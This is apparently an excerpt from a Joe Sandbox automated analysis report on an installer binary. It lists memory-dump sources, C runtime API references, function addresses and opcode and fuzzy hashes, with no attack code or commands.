                • Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd
                Similarity
                • API ID: AllocateHeap_free_malloc
                • String ID:
                • API String ID: 1020059152-0
                • Opcode ID: faf5cb07d6e30351408155d02f86ac8e1247cfffb76f8d01906df2beee9af920
                • Instruction ID: 3e853aeef85f704da6cd4213f16805b3b90553417758c9c1d55a5ad02f3ff6ff
                • Opcode Fuzzy Hash: faf5cb07d6e30351408155d02f86ac8e1247cfffb76f8d01906df2beee9af920
                • Instruction Fuzzy Hash: D411C133804A16ABCB233B74AC05F5B3799EB573B0F22452AF99A9F951DF308840C791
                APIs
                • __getptd.LIBCMT ref: 003AD9B1
                  • Part of subcall function 003A979C: __getptd_noexit.LIBCMT ref: 003A979F
                  • Part of subcall function 003A979C: __amsg_exit.LIBCMT ref: 003A97AC
                • __getptd.LIBCMT ref: 003AD9C8
                • __amsg_exit.LIBCMT ref: 003AD9D6
                • __lock.LIBCMT ref: 003AD9E6
                • __updatetlocinfoEx_nolock.LIBCMT ref: 003AD9FA
                Memory Dump Source
                • Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                • Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd
                Similarity
                • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                • String ID:
                • API String ID: 938513278-0
                • Opcode ID: edadf4a9ed61cc6266213714d0694a452d14ec86e9ba8acfa882212887d1f724
                • Instruction ID: a5bf371ad3d52a8108c6897d0954f93acc61dec7ff9c62e6efe36641c5f24446
                • Opcode Fuzzy Hash: edadf4a9ed61cc6266213714d0694a452d14ec86e9ba8acfa882212887d1f724
                • Instruction Fuzzy Hash: E1F090329407149EDB63BB689803B5E73A0EF02724F16420EF556AF9D3CB6598408B56
                Memory Dump Source
                • Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                • Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 8024148dedb523d599393b18b33e046caaf64555ef7a9df732d11554df66e9ce
                • Instruction ID: 025762bdf7bad554f1935efbb61ddc0d8dcfd3d00a335674e05b128013e02c55
                • Opcode Fuzzy Hash: 8024148dedb523d599393b18b33e046caaf64555ef7a9df732d11554df66e9ce
                • Instruction Fuzzy Hash: 63519E75901609AFCF16DFACC9818AFB7F9FF0A314B20056EE542A7652D771AE44CB20
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                • Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd
                Similarity
                • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                • String ID:
                • API String ID: 2782032738-0
                • Opcode ID: be099eb3870236c6dd2aadf504d5ef235c77f619fd41c052ede7db86fa8fa48e
                • Instruction ID: 437903998f227ad35c0c67e7dfadf940a40739100eaa81d3d80601a5ea78eeae
                • Opcode Fuzzy Hash: be099eb3870236c6dd2aadf504d5ef235c77f619fd41c052ede7db86fa8fa48e
                • Instruction Fuzzy Hash: D941E431A00F049FDB26DF6988846AEBBB7EF83360F29852CE46697590D770DE45CB40
                APIs
                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 003B3C19
                • __isleadbyte_l.LIBCMT ref: 003B3C4C
                • MultiByteToWideChar.KERNEL32(00000080,00000009,00001000,?,00000000,00000000,?,?,?), ref: 003B3C7D
                • MultiByteToWideChar.KERNEL32(00000080,00000009,00001000,00000001,00000000,00000000,?,?,?), ref: 003B3CEB
                Memory Dump Source
                • Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                • Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd
                Similarity
                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                • String ID:
                • API String ID: 3058430110-0
                • Opcode ID: 33eafa11ad98def418a2a1e9234d79d77e509956fbc5b8822c5e4109f6afb8bf
                • Instruction ID: 8094fba3f396426046e24adc421db56fdc3adea540afd2e7be478dcacb84c036
                • Opcode Fuzzy Hash: 33eafa11ad98def418a2a1e9234d79d77e509956fbc5b8822c5e4109f6afb8bf
                • Instruction Fuzzy Hash: 7D31D331A002A6EFCB22DFA4C884AF97FB5FF01314F168569E265AB591D730DE80DB50
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                • Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd
                Similarity
                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                • String ID:
                • API String ID: 3016257755-0
                • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                • Instruction ID: 9b910d03e8b7327379162ea48624bfa8dc65780888aec4ab50b3bebf5c1316b7
                • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                • Instruction Fuzzy Hash: 6B117B7600014ABBCF275F84CC05DEE3F66FB5A390B598856FA1869430D736C9B1AB81
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                • Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd
                Similarity
                • API ID: _wprintf
                • String ID:
                • API String ID: 2738768116-0
                • Opcode ID: 2549916cb6047d3ee36de9c546a6e9493caf7389bae9190b512b4f1fe44466c1
                • Instruction ID: a6317207956ed58b2b8ec3d19665b6fe382397ab0bb5501e641bb94299adb8a6
                • Opcode Fuzzy Hash: 2549916cb6047d3ee36de9c546a6e9493caf7389bae9190b512b4f1fe44466c1
                • Instruction Fuzzy Hash: CDF03027D4913429A93F71A6244EBCB9F04EB43BF8F26212BFECCEE4E159C1485181E5
                APIs
                • std::_Xinvalid_argument.LIBCPMT ref: 003A35E5
                  • Part of subcall function 003A38C7: std::exception::exception.LIBCMT ref: 003A38DC
                  • Part of subcall function 003A38C7: __CxxThrowException@8.LIBCMT ref: 003A38F1
                  • Part of subcall function 003A2279: std::_Xinvalid_argument.LIBCPMT ref: 003A228A
                • _memmove.LIBCMT ref: 003A3640
                Strings
                • invalid string position, xrefs: 003A35E0
                Memory Dump Source
                • Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                • Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd
                Similarity
                • API ID: Xinvalid_argumentstd::_$Exception@8Throw_memmovestd::exception::exception
                • String ID: invalid string position
                • API String ID: 1253240057-1799206989
                • Opcode ID: 5606f209beca6d9b59f9d5a3f7f6e65a3e22a413d3f68000a1ac01e97084dfe9
                • Instruction ID: 3c2c05a9b26648fbcec5408e4ea6812902785da9d3f637585a1d0e1fd85fb931
                • Opcode Fuzzy Hash: 5606f209beca6d9b59f9d5a3f7f6e65a3e22a413d3f68000a1ac01e97084dfe9
                • Instruction Fuzzy Hash: 9311A731704210BBCB279F1C98D1A6AB3A9EF97710F10092DF9568B391DB71DB01C795
                APIs
                • std::_Xinvalid_argument.LIBCPMT ref: 003A2171
                  • Part of subcall function 003A38C7: std::exception::exception.LIBCMT ref: 003A38DC
                  • Part of subcall function 003A38C7: __CxxThrowException@8.LIBCMT ref: 003A38F1
                • _memmove.LIBCMT ref: 003A21AA
                Strings
                • invalid string position, xrefs: 003A216C
                Memory Dump Source
                • Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                • Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd
                Similarity
                • API ID: Exception@8ThrowXinvalid_argument_memmovestd::_std::exception::exception
                • String ID: invalid string position
                • API String ID: 22950630-1799206989
                • Opcode ID: d00a7cdfc602163029ddb83ee11e2d1d684e6e0cd5331956930c94f46433862a
                • Instruction ID: 6cbd4df51f5cb45224d55eb83ec9ec1d9dd58342c641fb40ef7d58b19f081eb3
                • Opcode Fuzzy Hash: d00a7cdfc602163029ddb83ee11e2d1d684e6e0cd5331956930c94f46433862a
                • Instruction Fuzzy Hash: 0101B1313006409BD7269E6CCCC486BB7BAEB827147204D3DE6828BA45DBB4EC4587A0
                APIs
                • _strcpy_s.LIBCMT ref: 003A67F4
                • __invoke_watson.LIBCMT ref: 003A6848
                  • Part of subcall function 003A6683: _strcat_s.LIBCMT ref: 003A66A2
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                • Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd
                Similarity
                • API ID: __invoke_watson_strcat_s_strcpy_s
                • String ID: &k:
                • API String ID: 312943863-2206501022
                • Opcode ID: 19f811498c503797a990f38c39f5063f992842676a9e3917b59691a60135d52e
                • Instruction ID: 74541c4c94950748f94f09bf531cce71d970ba1d5a3810152d9bdac9377860c8
                • Opcode Fuzzy Hash: 19f811498c503797a990f38c39f5063f992842676a9e3917b59691a60135d52e
                • Instruction Fuzzy Hash: F3F06D725402587BDF136AA08C4BEEA3F5DEB02764F498062FA195A062E7369E14D790
                APIs
                  • Part of subcall function 003A4895: __getptd.LIBCMT ref: 003A489B
                  • Part of subcall function 003A4895: __getptd.LIBCMT ref: 003A48AB
                • __getptd.LIBCMT ref: 003A7AC8
                  • Part of subcall function 003A979C: __getptd_noexit.LIBCMT ref: 003A979F
                  • Part of subcall function 003A979C: __amsg_exit.LIBCMT ref: 003A97AC
                • __getptd.LIBCMT ref: 003A7AD6
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                • Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd
                Similarity
                • API ID: __getptd$__amsg_exit__getptd_noexit
                • String ID: csm
                • API String ID: 803148776-1018135373
                • Opcode ID: 9be489d9b2c9357c481f46e0d1185517e740e94918750dde5ba21505126bd088
                • Instruction ID: 194e2ae5c68ce324b8aa910c8fb5cd2cbe2dabeaaec5964be46944d939c3d5fc
                • Opcode Fuzzy Hash: 9be489d9b2c9357c481f46e0d1185517e740e94918750dde5ba21505126bd088
                • Instruction Fuzzy Hash: 4A016279805205CBCF3A9F22DC8866DB3B9EF16311F25482EE0415A561CB758981CBA1